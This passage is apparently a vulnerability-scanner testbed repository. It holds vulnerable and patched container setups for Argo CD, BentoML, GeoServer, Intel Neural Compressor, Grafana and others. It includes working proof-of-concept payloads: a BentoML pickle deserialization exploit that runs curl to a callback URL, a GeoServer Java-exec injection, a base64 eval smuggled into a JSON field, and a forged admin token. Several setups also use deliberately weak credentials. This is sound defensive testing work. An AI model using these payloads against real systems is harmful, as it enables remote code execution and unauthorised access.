23 | 33 | -------------------------------------------------------------------------------- /argo-cd/CVE-2022-29165/README.md: -------------------------------------------------------------------------------- 1 | # setup requirements 2 | 1. k8s with minikube: https://minikube.sigs.k8s.io/docs/start/ (we can use original k8s but this is a easy solution) 3 | 2. please don't forget to add `alias kubectl="minikube kubectl --"` to your shell environment. 4 | 5 | # setup vulnerable instance (v2.3.3) 6 | 7 | ```bash 8 | kubectl create namespace argocd 9 | kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.3.3/manifests/install.yaml 10 | kubectl edit -n argocd cm argocd-cm -o yaml 11 | ``` 12 | 13 | append the following: 14 | ```yaml 15 | data: 16 | users.anonymous.enabled: "true" 17 | ``` 18 | 19 | check anonymous access is enabled: 20 | `kubectl get -n argocd cm argocd-cm -o jsonpath='{.data.users\.anonymous\.enabled}'` 21 | 22 | give access to the server from 127.0.0.1:8082 for testing the plugin: 23 | `kubectl port-forward svc/argocd-server -n argocd 8082:443` 24 | 25 | check it manually in another shell: 26 | ```bash 27 | curl -i -s -k -X $'GET' -H $'Host: 127.0.0.1:8082' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates' 28 | ``` 29 | 30 | # setup safe instance (v2.3.4) 31 | 32 | ```bash 33 | kubectl create namespace argocdsafe 34 | kubectl apply -n argocdsafe -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.3.4/manifests/install.yaml 35 | kubectl edit -n argocdsafe cm argocd-cm -o yaml 36 | ``` 37 | 38 | append the following: 39 | ```yaml 40 | data: 41 | users.anonymous.enabled: "true" 42 | ``` 43 | 44 | check anonymous access is enabled: 45 | `kubectl get -n argocdsafe cm argocd-cm -o jsonpath='{.data.users\.anonymous\.enabled}'` 46 | 47 | give access to the server from 127.0.0.1:8081 for testing the plugin: 48 | 
`kubectl port-forward svc/argocd-server -n argocdsafe 8081:443` 49 | 50 | check it manually in another shell: 51 | ```bash 52 | curl -i -s -k -X $'GET' -H $'Host: 127.0.0.1:8081' -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ' $'https://127.0.0.1:8081/api/v1/certificates' 53 | ``` 54 | -------------------------------------------------------------------------------- /argo-cd/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | 2 | # setup requirements 3 | 1. k8s with minikube: https://minikube.sigs.k8s.io/docs/start/ (we can use original k8s but this is a easy solution) 4 | 2. please don't forget to add alias kubectl="minikube kubectl --" to your shell environment. 5 | 6 | # vulnerable instance 7 | ```bash 8 | kubectl create namespace argocd 9 | kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml 10 | # set default password for admin: 11 | kubectl -n argocd patch secret argocd-secret \ 12 | -p '{"stringData": { 13 | "admin.password": "$2a$10$hDj12Tw9xVmvybSahN1Y0.f9DZixxN8oybyA32Uy/eqWklFU4Mo8O", 14 | "admin.passwordMtime": "'$(date +%FT%T%Z)'" 15 | }}' 16 | kubectl port-forward svc/argocd-server -n argocd 8082:443 17 | ``` 18 | Open your browser, go to the address https://127.0.0.1:8082, and enter the credentials `admin:Password1!` on the login page. 19 | 20 | # secure instance 21 | ```bash 22 | kubectl create namespace argocd 23 | kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml 24 | kubectl port-forward svc/argocd-server -n argocd 8082:443 25 | ``` 26 | 27 | Open your browser, and go to the address https://127.0.0.1:8082, you can't use any default credentials, the new credentials are random. 
28 | -------------------------------------------------------------------------------- /atlassian/bitbucket/CVE-2022-36804/README.md: -------------------------------------------------------------------------------- 1 | # Atlassian BitBucket CVE-2022-36804 2 | 3 | ## Description of Vulnerability 4 | 5 | A vulnerability (CVE-2022-36804) in Bitbucket allows remote code execution. 6 | An attacker with read or public access to a 7 | repository can execute arbitrary code by sending a malicious 8 | HTTP request. All versions released after 6.10.17 9 | including 7.0.0 and newer are affected, this means that all 10 | instances that are running any versions between 7.0.0 and 11 | 8.3.0 inclusive can be exploited by this vulnerability. 12 | 13 | ## Vulnerable setup 14 | 15 | 1. download image and run the container 16 | 17 | ```sh 18 | docker run --name="tsunami-bitbucket-8-3" -d -p 37990:7990 -p 37999:7999 atlassian/bitbucket:8.3.0 19 | ``` 20 | 21 | 2. The instance will be available on port 37990 22 | 3. Install bitbucket, fill license code and create the administrator account 23 | 4. Create a public repository (Repository settings > Repository permissions > Public Access) 24 | 5. Add at least one file to the repository 25 | 6. Ensure a default branch is selected 26 | 27 | ## Non-vulnerable setup 28 | 29 | Only the version of the bitbucket container needs to be changed: 30 | 31 | ```sh 32 | docker run --name="tsunami-bitbucket-8-3" -d -p 37990:7990 -p 37999:7999 atlassian/bitbucket:8.3.1 33 | ``` 34 | -------------------------------------------------------------------------------- /atlassian/confluence/CVE-2023-22518/README.md: -------------------------------------------------------------------------------- 1 | # Atlassian Confluence CVE-2023-22518 2 | 3 | ## Vulnerable setup 4 | 5 | You will need to expose a PostgreSQL instance to the confluence environment.
You 6 | will need the IP address of the `docker0` interface (or any other interface that 7 | is used by your docker daemon). 8 | 9 | In the following example, the IP address `172.17.0.1` is used: 10 | 11 | ```sh 12 | $ docker run --rm --name confluencePG -e POSTGRES_USER=confluence -e POSTGRES_PASSWORD=confluence -e POSTGRES_DB=confluence -p "172.17.0.1:5432:5432" -d postgres 13 | $ docker run --rm --name confluence -d -p 8090:8090 -p 8091:8091 atlassian/confluence:8.5.1-ubuntu-jdk11 14 | ``` 15 | 16 | Note: The instances are stateless and shutting them down will reset all changes. 17 | 18 | Once the instances are running, you can navigate to http://127.0.0.1:8090 and 19 | start setting up the confluence instance. The vulnerability will only be 20 | triggered once the full installation has been finalized. 21 | 22 | ## Non-vulnerable setup 23 | 24 | Only the version of the Confluence container needs to be changed: 25 | 26 | ```sh 27 | $ docker run --rm --name confluencePG -e POSTGRES_USER=confluence -e POSTGRES_PASSWORD=confluence -e POSTGRES_DB=confluence -p "172.17.0.1:5432:5432" -d postgres 28 | $ docker run --rm --name confluence -d -p 8090:8090 -p 8091:8091 atlassian/confluence:8.6.1-ubuntu-jdk11 29 | ``` 30 | -------------------------------------------------------------------------------- /bentoml/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | RUN mkdir /workdir 3 | WORKDIR /workdir 4 | COPY service.py /workdir/ 5 | RUN apt update \ 6 | && apt install curl python3.11 python3-pip python3.11-venv -y 7 | ARG BENTOML_VERSION 8 | RUN pip3 install pydantic==2.8.2 bentoml==${BENTOML_VERSION} 9 | CMD bentoml serve service:Summarization 10 | -------------------------------------------------------------------------------- /bentoml/README.md: -------------------------------------------------------------------------------- 1 | # vulnerable version setup 2 | 3 | ```bash 4 | docker compose
-f docker-compose-vulnerable.yml up 5 | ``` 6 | run the exploit: 7 | ``` 8 | ncat -klnv 1337 9 | python3 exploit.py 10 | ``` 11 | you'll receive a http request on port 1337 which means the exploit worked. 12 | 13 | # safe version setup 14 | 15 | ```bash 16 | docker compose -f docker-compose-safe.yml up 17 | ``` 18 | run the exploit: 19 | ``` 20 | ncat -klnv 1337 21 | python3 exploit.py 22 | ``` 23 | you won't receive any data on port 1337 since the exploit didn't work. 24 | -------------------------------------------------------------------------------- /bentoml/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | services: 2 | bentoml-safe: 3 | build: 4 | context: . 5 | args: 6 | BENTOML_VERSION: 1.2.5 7 | ports: 8 | - "3000:3000" 9 | -------------------------------------------------------------------------------- /bentoml/docker-compose-vulnerable.yml: -------------------------------------------------------------------------------- 1 | services: 2 | bentoml-vuln: 3 | build: 4 | context: . 
5 | args: 6 | BENTOML_VERSION: 1.2.0 7 | ports: 8 | - "3000:3000" 9 | -------------------------------------------------------------------------------- /bentoml/exploit.py: -------------------------------------------------------------------------------- 1 | import pickle, os, requests 2 | 3 | url = input("Please specify the URL that will receive the callback: ") 4 | print(f"Command that will be executed: curl {url}") 5 | class P(object): 6 | def __reduce__(self): 7 | return (os.system, (f"curl {url}",)) 8 | 9 | requests.post('http://127.0.0.1:3000/summarize', data=pickle.dumps(P()), 10 | headers={"Content-Type": "application/vnd.bentoml+pickle"}) 11 | -------------------------------------------------------------------------------- /bentoml/service.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | import bentoml 3 | 4 | @bentoml.service( 5 | resources={"cpu": "2"}, 6 | traffic={"timeout": 10}, 7 | ) 8 | class Summarization: 9 | def __init__(self) -> None: 10 | pass 11 | 12 | @bentoml.api 13 | def summarize(self, text: str) -> str: 14 | return "Hello World" 15 | -------------------------------------------------------------------------------- /couchbase/weak_credentials/couchbase.md: -------------------------------------------------------------------------------- 1 | # Couchbase 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run -d --name some-couch -p 8091-8097:8091-8097 -p 9123:9123 -p 11207:11207 -p 11210:11210 -p 11280:11280 -p 18091-18097:18091-18097 couchbase` 5 | 6 | 2. Connect to the db: Go to `localhost:8091` and finish set up 7 | 8 | 3. 
Verify Couchbase is working as intended: `curl 127.0.0.1:8091/pools --user "Administrator:example"` -------------------------------------------------------------------------------- /drupal/CVE-2018-7600/README.md: -------------------------------------------------------------------------------- 1 | # Drupal CVE-2018-7600 2 | 3 | This directory contains the deployment config for Drupal with exposed endpoint 4 | vulnerable to CVE-2018-7600. Drupal versions before 7.58, 8.x before 8.3.9, 5 | 8.4.x before 8.4.6, and 8.5.x before 8.5.1 have this vulnerability. 6 | 7 | The deployed service has name `drupal-cve-2018-7600` and listens on port `80`. 8 | 9 | -------------------------------------------------------------------------------- /drupal/CVE-2018-7600/drupal-cve-2018-7600.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: drupal-cve-2018-7600 6 | labels: 7 | app: drupal-cve-2018-7600 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | selector: 13 | app: drupal-cve-2018-7600 14 | type: LoadBalancer 15 | --- 16 | # The PHP app. 
17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: drupal-cve-2018-7600 21 | labels: 22 | app: drupal-cve-2018-7600 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: drupal-cve-2018-7600 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: drupal-cve-2018-7600 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: drupal-cve-2018-7600 38 | image: drupal:${drupal_version} 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /drupal/CVE-2019-6340/README.md: -------------------------------------------------------------------------------- 1 | # Drupal CVE-2019-6340 2 | 3 | This directory contains the deployment config for Drupal with exposed endpoint 4 | vulnerable to CVE-2019-6340. Drupal versions of Drupal 8.5.x before 8.5.11 and 5 | Drupal 8.6.x before 8.6.10 have this vulnerability. 6 | 7 | The deployed service has name `drupal-cve-2019-6340` and listens on port `80`. 8 | -------------------------------------------------------------------------------- /drupal/CVE-2019-6340/drupal-cve-2019-6340.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: drupal-cve-2019-6340 6 | labels: 7 | app: drupal-cve-2019-6340 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | selector: 13 | app: drupal-cve-2019-6340 14 | type: LoadBalancer 15 | --- 16 | # The PHP app. 
17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: drupal-cve-2019-6340 21 | labels: 22 | app: drupal-cve-2019-6340 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: drupal-cve-2019-6340 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: drupal-cve-2019-6340 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: drupal-cve-2019-6340 38 | image: gcr.io/tsunami-testbed/drupal_cve_2019_6340:latest 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /ftp/weak_credentials/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | # Usage example: https://github.com/stilliard/docker-pure-ftpd/wiki/Docker-stack-with-Wordpress-&-FTP 4 | 5 | services: 6 | ftpd_server: 7 | image: stilliard/pure-ftpd 8 | container_name: pure-ftpd 9 | ports: 10 | - "21:21" 11 | - "30000-30009:30000-30009" 12 | volumes: # remember to replace /folder_on_disk/ with the path to where you want to store the files on the host machine 13 | - "/folder_on_disk/data:/home/username/" 14 | - "/folder_on_disk/passwd:/etc/pure-ftpd/passwd" 15 | # uncomment for ssl/tls, see https://github.com/stilliard/docker-pure-ftpd#tls 16 | # - "/folder_on_disk/ssl:/etc/ssl/private/" 17 | # or ssl/tls with Let's Encrypt (cert and key as two files) 18 | # - "/etc/letsencrypt/live//cert.pem:/etc/ssl/private/pure-ftpd-cert.pem" 19 | # - "/etc/letsencrypt/live//privkey.pem:/etc/ssl/private/pure-ftpd-key.pem" 20 | environment: 21 | PUBLICHOST: "localhost" 22 | FTP_USER_NAME: username 23 | FTP_USER_PASS: mypass 24 | FTP_USER_HOME: /home/username 25 | # also for ssl/tls: 26 | # ADDED_FLAGS: "--tls=2" 27 | restart: always 28 | -------------------------------------------------------------------------------- /ftp/weak_credentials/ftp.md: 
-------------------------------------------------------------------------------- 1 | # FTP 2 | # Setup 3 | 4 | 1. View the docker-compose.yml file to see the selected username and password 5 | 6 | 2. Run the compose file in this directory: `docker-compose up` 7 | 8 | 3. Verify FTP is working as expected using this command: `ftp -p localhost 21` 9 | -------------------------------------------------------------------------------- /geoserver/cve_2024_36401/README.md: -------------------------------------------------------------------------------- 1 | # Vulnerable version 2 | ``` 3 | docker compose -f docker-compose-vuln.yml up 4 | curl "http://127.0.0.1:8080/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1')" 5 | docker exec -it geoserver-vulnerable-1 /bin/bash 6 | ls /tmp/success1 7 | ``` 8 | # Patched version 9 | do the same for a secured geoserver instance at 127.0.0.1 10 | ``` 11 | docker compose -f docker-compose-safe.yml up 12 | curl "http://127.0.0.1:8080/geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success2')" 13 | docker exec -it geoserver-safe-1 /bin/bash 14 | ls /tmp/success2 15 | ``` 16 | you can see there is no file with this path 17 | -------------------------------------------------------------------------------- /geoserver/cve_2024_36401/docker-compose-safe.yml: -------------------------------------------------------------------------------- 1 | services: 2 | geoserver-safe: 3 | image: docker.osgeo.org/geoserver:2.25.3 4 | ports: 5 | - "8080:8080" 6 | -------------------------------------------------------------------------------- /geoserver/cve_2024_36401/docker-compose-vuln.yml: -------------------------------------------------------------------------------- 1 | services: 2 | geoserver-vulnerable: 3 | image: 
docker.osgeo.org/geoserver:2.23.2 4 | ports: 5 | - "8080:8080" 6 | -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/README.md: -------------------------------------------------------------------------------- 1 | # Gradio CVE-2023-51449 2 | 3 | ## Vulnerable setup 4 | 5 | ```bash 6 | docker build -t gradio:vuln -f vulnerable.Dockerfile . 7 | docker run --name gradio-vuln -p 8000:8000 -d gradio:vuln 8 | ``` 9 | 10 | Application will be available at `localhost:8000` 11 | 12 | ## Non-vulnerable setup 13 | 14 | ```bash 15 | docker build -t gradio:novuln -f non-vulnerable.Dockerfile . 16 | docker run --name gradio-novuln -p 8000:8000 -d gradio:novuln 17 | ``` 18 | 19 | Application will be available at `localhost:8000` -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/non-vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-slim 2 | 3 | RUN python -m pip install gradio==4.11.0 4 | 5 | ADD test_app.py /workspace/ 6 | 7 | EXPOSE 8000 8 | 9 | CMD [ "python3" , "/workspace/test_app.py" ] -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/test_app.py: -------------------------------------------------------------------------------- 1 | import gradio as gr 2 | 3 | def greet(name, intensity): 4 | return "Hello, " + name + "!" 
* int(intensity) 5 | 6 | demo = gr.Interface( 7 | fn=greet, 8 | inputs=["text", "slider"], 9 | outputs=["text"], 10 | ) 11 | 12 | if __name__ == "__main__": 13 | demo.launch(server_name="0.0.0.0", server_port=8000) 14 | -------------------------------------------------------------------------------- /gradio/CVE-2023-51449/vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-slim 2 | 3 | RUN python -m pip install gradio==4.10.0 4 | 5 | ADD test_app.py /workspace/ 6 | 7 | EXPOSE 8000 8 | 9 | CMD [ "python3" , "/workspace/test_app.py" ] 10 | -------------------------------------------------------------------------------- /grafana/weak_credentials/Dockerfile.Grafana: -------------------------------------------------------------------------------- 1 | FROM grafana/grafana:10.0.0 2 | 3 | ENV GF_INSTALL_PLUGINS=grafana-simple-json-datasource 4 | 5 | # override some default values 6 | ENV GF_SECURITY_ADMIN_USER=admin 7 | ENV GF_SECURITY_ADMIN_PASSWORD=qwertyuiop 8 | ENV GF_SECURITY_DISABLE_BRUTE_FORCE_LOGIN_PROTECTION=TRUE 9 | 10 | HEALTHCHECK CMD curl --fail http://localhost:3000/ || exit 11 | 12 | EXPOSE 3000 -------------------------------------------------------------------------------- /grafana/weak_credentials/grafana.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 3 | # Note 4 | The `Dockerfile.Grafana` contains the following customization: 5 | - the admin user is created with the credential `admin:qwertyuiop` instead of the usual `admin:admin` 6 | - grafana is started with disabled brute force login protection (`GF_SECURITY_DISABLE_BRUTE_FORCE_LOGIN_PROTECTION=TRUE`) - by default it is enabled 7 | 8 | # Setup 9 | 1. Ensure the files `runAndBuildGraphana.sh` and `Dockerfile.Grafana` are in the same folder 10 | 11 | 2. Create docker images with this command: `chmod +x runAndBuildGraphana.sh && ./runAndBuildGraphana.sh` 12 | 13 | 3. 
Connect to http://localhost:8873/ via browser 14 | 15 | 4. Verify that grafana is running correctly by logging in with credentials `admin:qwertyuiop` 16 | -------------------------------------------------------------------------------- /grafana/weak_credentials/runAndBuildGraphana.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | docker build --platform linux --no-cache -t graphana:test -f Dockerfile.Grafana . && docker run -p 127.0.0.1:8873:3000 -it --rm graphana:test -------------------------------------------------------------------------------- /h2o/exposed_ui/README.md: -------------------------------------------------------------------------------- 1 | # Exposed h2o UI 2 | This directory contains the deployment configs for h2o without authentication. 3 | The deployed service has name `h2o-ai` and listens on port `80`. -------------------------------------------------------------------------------- /h2o/exposed_ui/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 
14 | FROM h2oai/h2o-open-source-k8s as chroot 15 | 16 | COPY flag / 17 | COPY chal.sh /home/user/ 18 | COPY socat /home/user/ 19 | 20 | FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f 21 | 22 | COPY --from=chroot / /chroot 23 | 24 | COPY nsjail.cfg /home/user/ 25 | 26 | CMD kctf_setup && \ 27 | kctf_drop_privs \ 28 | socat \ 29 | TCP-LISTEN:1337,reuseaddr,fork \ 30 | EXEC:"nsjail --config /home/user/nsjail.cfg -- /home/user/chal.sh" -------------------------------------------------------------------------------- /h2o/exposed_ui/challenge/chal.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | java -Djava.library.path=/opt/h2oai/h2o-3/xgb_lib_dir -XX:+UseContainerSupport -XX:MaxRAMPercentage=50 -jar /opt/h2oai/h2o-3/h2o.jar 1>&2 & 3 | 4 | /home/user/socat TCP:127.0.0.1:54321,retry,forever stdio -------------------------------------------------------------------------------- /h2o/exposed_ui/challenge/nsjail.cfg: -------------------------------------------------------------------------------- 1 | # Copyright 2020 Google LLC 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # https://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # See options available at https://github.com/google/nsjail/blob/master/config.proto 16 | 17 | name: "default-nsjail-configuration" 18 | description: "Default nsjail configuration for pwnable-style CTF task." 
19 | 20 | mode: ONCE 21 | uidmap {inside_id: "1000"} 22 | gidmap {inside_id: "1000"} 23 | rlimit_as_type: HARD 24 | rlimit_cpu_type: HARD 25 | rlimit_nofile_type: HARD 26 | rlimit_nproc_type: HARD 27 | 28 | cwd: "/home/user" 29 | 30 | keep_env: true 31 | 32 | mount: [ 33 | { 34 | src: "/chroot" 35 | dst: "/" 36 | is_bind: true 37 | }, 38 | { 39 | dst: "/tmp" 40 | fstype: "tmpfs" 41 | rw: true 42 | }, 43 | { 44 | dst: "/proc" 45 | fstype: "proc" 46 | rw: true 47 | }, 48 | { 49 | src: "/etc/resolv.conf" 50 | dst: "/etc/resolv.conf" 51 | is_bind: true 52 | }, 53 | { 54 | src: "/dev" 55 | dst: "/dev" 56 | is_bind: true 57 | }, 58 | { 59 | src: "/dev/null" 60 | dst: "/dev/null" 61 | is_bind: true 62 | } 63 | ] 64 | -------------------------------------------------------------------------------- /h2o/exposed_ui/h2o.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: h2o-ai 5 | labels: 6 | app: h2o-ai 7 | spec: 8 | ports: 9 | - port: 80 10 | name: http 11 | targetPort: 54321 12 | selector: 13 | app: h2o-ai 14 | type: LoadBalancer 15 | --- 16 | apiVersion: apps/v1 17 | kind: Deployment 18 | metadata: 19 | name: h2o-ai 20 | labels: 21 | app: h2o-ai 22 | spec: 23 | selector: 24 | matchLabels: 25 | app: h2o-ai 26 | strategy: 27 | type: Recreate 28 | template: 29 | metadata: 30 | labels: 31 | app: h2o-ai 32 | spec: 33 | containers: 34 | - name: h2o-ai 35 | image: h2oai/h2o-open-source-k8s:3.44.0.3@sha256:cacf09e3811f3170d70743987a3a32ccf00c0872b5e5443befd626f2ddfa1fde 36 | ports: 37 | - containerPort: 54321 -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/Fixed.Dockerfile: -------------------------------------------------------------------------------- 1 | # 2 | # Copyright (c) 2022 Intel Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file 
except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | ARG UBUNTU_VER=20.04 17 | FROM ubuntu:${UBUNTU_VER} as deploy 18 | 19 | # See http://bugs.python.org/issue19846 20 | ENV LANG C.UTF-8 21 | ARG PYTHON=python3.8 22 | 23 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends --fix-missing \ 24 | ${PYTHON}-dev \ 25 | gcc \ 26 | libgl1-mesa-glx \ 27 | libglib2.0-0 \ 28 | python3 \ 29 | python3-pip \ 30 | curl \ 31 | libopenmpi-dev \ 32 | wget 33 | 34 | RUN ${PYTHON} -m pip --no-cache-dir install --upgrade \ 35 | pip \ 36 | setuptools 37 | 38 | RUN ln -sf $(which ${PYTHON}) /usr/local/bin/python && \ 39 | ln -sf $(which ${PYTHON}) /usr/local/bin/python3 && \ 40 | ln -sf $(which ${PYTHON}) /usr/bin/python && \ 41 | ln -sf $(which ${PYTHON}) /usr/bin/python3 42 | 43 | ARG INC_VER=2.5.1 44 | 45 | 46 | RUN python -m pip install --no-cache-dir neural-compressor${INC_VER:+==${INC_VER}} 47 | RUN python -m pip install --no-cache-dir neural-solution${INC_VER:+==${INC_VER}} 48 | -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/README.md: -------------------------------------------------------------------------------- 1 | # Intel(R) Neural Compressor CVE-2024-22476 2 | 3 | This directory contains the deployment config for Intel(R) Neural Compressor instances vulnerable and fixed to CVE-2024-22476. Instances before version 2.5.0 may allow an unauthenticated user to potentially enable escalation of privilege via remote access. 
4 | 5 | ## How to Trigger the Vulnerability? 6 | 7 | To trigger the vulnerability, you can use the curl and task_request.json file. In a vulnerable environment, the curl request below will create a file called attack.py under the root directory of the container. 8 | 9 | ``` 10 | curl -X POST -H "Content-Type: application/json" --data @./task_request.json http://127.0.0.1:8000/task/submit/ 11 | ``` 12 | 13 | In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them. 14 | 15 | ``` 16 | sudo docker rmi -f $(sudo docker images -aq) 17 | sudo docker remove $(sudo docker ps -a -q) 18 | ``` 19 | 20 | ## Vulnerable Setup 21 | 22 | ``` 23 | docker build -t neuralcompressor:vuln -f Vulnerable.Dockerfile . 24 | docker run --name neuralcompressor-vuln --network host -it neuralcompressor:vuln bash 25 | neural_solution --conda_env test start (In the container bash) 26 | ``` 27 | 28 | Application will be available at `localhost:8000` 29 | 30 | ## Non-vulnerable Setup 31 | 32 | ``` 33 | docker build -t neuralcompressor:fixed -f Fixed.Dockerfile . 34 | docker run --name neuralcompressor-fixed --network host -it neuralcompressor:fixed bash 35 | neural_solution --conda_env test start (In the container bash) 36 | ``` 37 | 38 | Application will be available at `localhost:8000` 39 | -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/Vulnerable.Dockerfile: -------------------------------------------------------------------------------- 1 | # 2 | # Copyright (c) 2022 Intel Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 
6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | ARG UBUNTU_VER=20.04 17 | FROM ubuntu:${UBUNTU_VER} as deploy 18 | 19 | # See http://bugs.python.org/issue19846 20 | ENV LANG C.UTF-8 21 | ARG PYTHON=python3.8 22 | 23 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends --fix-missing \ 24 | ${PYTHON}-dev \ 25 | gcc \ 26 | libgl1-mesa-glx \ 27 | libglib2.0-0 \ 28 | python3 \ 29 | python3-pip \ 30 | curl \ 31 | libopenmpi-dev \ 32 | wget 33 | 34 | RUN ${PYTHON} -m pip --no-cache-dir install --upgrade \ 35 | pip \ 36 | setuptools 37 | 38 | RUN ln -sf $(which ${PYTHON}) /usr/local/bin/python && \ 39 | ln -sf $(which ${PYTHON}) /usr/local/bin/python3 && \ 40 | ln -sf $(which ${PYTHON}) /usr/bin/python && \ 41 | ln -sf $(which ${PYTHON}) /usr/bin/python3 42 | 43 | ARG INC_VER=2.2 44 | 45 | 46 | RUN python -m pip install --no-cache-dir neural-compressor${INC_VER:+==${INC_VER}} 47 | RUN python -m pip install --no-cache-dir neural-solution${INC_VER:+==${INC_VER}} 48 | -------------------------------------------------------------------------------- /intel/neural-compressor/CVE-2024-22476/task_request.json: -------------------------------------------------------------------------------- 1 | { 2 | "script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5 | base64 --decode)\"", 3 | "optimized": "False", 4 | "arguments": [ 5 | "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result" 6 | 
